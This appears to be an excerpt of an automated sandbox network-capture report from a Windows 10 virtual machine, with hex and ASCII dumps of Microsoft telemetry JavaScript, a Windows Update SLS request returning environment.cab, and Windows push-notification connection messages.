                                                                                                                                                                                    2024-11-29 18:49:58 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                    Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                    2024-11-29 18:49:58 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                    Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                    2024-11-29 18:49:58 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                    Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                    2024-11-29 18:49:58 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                    Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                    2024-11-29 18:49:58 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                    Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                    2024-11-29 18:49:58 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                    Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                    2024-11-29 18:49:58 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                    Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                    2024-11-29 18:49:58 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                    Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                    2024-11-29 18:49:58 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                    Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    78192.168.2.64982352.149.20.212443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:50:01 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=79HRUOOHgFAO4nP&MD=mY8Kwcd6 HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                    2024-11-29 18:50:02 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                    ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                    MS-CorrelationId: a3bd159b-8e86-4d16-b0e1-480ad8afc268
                                                                                                                                                                                    MS-RequestId: d53309f7-b1d6-40b3-b80d-847e673a391b
                                                                                                                                                                                    MS-CV: XuPUZAaVlEOyUk2O.0
                                                                                                                                                                                    X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:50:01 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 30005
                                                                                                                                                                                    2024-11-29 18:50:02 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                    Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                    2024-11-29 18:50:02 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                    Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    79192.168.2.64984120.198.119.143443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:50:06 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 71 30 6c 6c 6f 32 6c 63 31 55 71 39 41 2f 4d 74 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 34 31 34 62 39 65 31 62 37 39 39 38 64 63 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: CNT 1 CON 304MS-CV: q0llo2lc1Uq9A/Mt.1Context: b414b9e1b7998dc
                                                                                                                                                                                    2024-11-29 18:50:06 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                    2024-11-29 18:50:06 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 71 30 6c 6c 6f 32 6c 63 31 55 71 39 41 2f 4d 74 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 34 31 34 62 39 65 31 62 37 39 39 38 64 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 39 7a 2b 50 5a 4c 67 39 31 67 42 54 59 51 52 67 6c 6f 56 44 6d 62 79 38 54 4b 65 6d 74 74 79 32 6e 35 43 4a 35 63 2f 71 55 49 31 57 6a 4b 41 38 6f 43 33 58 49 77 50 53 51 47 62 42 47 4a 53 58 41 49 47 49 74 63 42 6f 63 7a 53 67 31 52 79 4b 31 49 62 50 2f 74 6a 62 30 50 6a 61 41 4f 76 4b 79 63 33 47 36 50 36 73 58 77 2f 47 45
                                                                                                                                                                                    Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: q0llo2lc1Uq9A/Mt.2Context: b414b9e1b7998dc<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAa9z+PZLg91gBTYQRgloVDmby8TKemtty2n5CJ5c/qUI1WjKA8oC3XIwPSQGbBGJSXAIGItcBoczSg1RyK1IbP/tjb0PjaAOvKyc3G6P6sXw/GE
                                                                                                                                                                                    2024-11-29 18:50:06 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 71 30 6c 6c 6f 32 6c 63 31 55 71 39 41 2f 4d 74 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 34 31 34 62 39 65 31 62 37 39 39 38 64 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                    Data Ascii: BND 3 CON\WNS 0 196MS-CV: q0llo2lc1Uq9A/Mt.3Context: b414b9e1b7998dc<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                    2024-11-29 18:50:07 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                    Data Ascii: 202 1 CON 58
                                                                                                                                                                                    2024-11-29 18:50:07 UTC58INData Raw: 4d 53 2d 43 56 3a 20 46 75 4b 4f 73 46 31 45 38 55 4f 54 69 34 57 72 6c 6a 6a 6f 2f 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                    Data Ascii: MS-CV: FuKOsF1E8UOTi4Wrljjo/Q.0Payload parsing failed.


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    80192.168.2.64988920.198.119.143443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:50:35 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 58 4b 67 37 2f 30 4f 5a 55 30 43 34 6a 61 6b 46 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 39 38 36 63 66 31 63 32 39 62 66 61 30 38 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: CNT 1 CON 305MS-CV: XKg7/0OZU0C4jakF.1Context: c4986cf1c29bfa08
                                                                                                                                                                                    2024-11-29 18:50:35 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                    2024-11-29 18:50:35 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 58 4b 67 37 2f 30 4f 5a 55 30 43 34 6a 61 6b 46 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 39 38 36 63 66 31 63 32 39 62 66 61 30 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 39 7a 2b 50 5a 4c 67 39 31 67 42 54 59 51 52 67 6c 6f 56 44 6d 62 79 38 54 4b 65 6d 74 74 79 32 6e 35 43 4a 35 63 2f 71 55 49 31 57 6a 4b 41 38 6f 43 33 58 49 77 50 53 51 47 62 42 47 4a 53 58 41 49 47 49 74 63 42 6f 63 7a 53 67 31 52 79 4b 31 49 62 50 2f 74 6a 62 30 50 6a 61 41 4f 76 4b 79 63 33 47 36 50 36 73 58 77 2f 47
                                                                                                                                                                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: XKg7/0OZU0C4jakF.2Context: c4986cf1c29bfa08<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAa9z+PZLg91gBTYQRgloVDmby8TKemtty2n5CJ5c/qUI1WjKA8oC3XIwPSQGbBGJSXAIGItcBoczSg1RyK1IbP/tjb0PjaAOvKyc3G6P6sXw/G
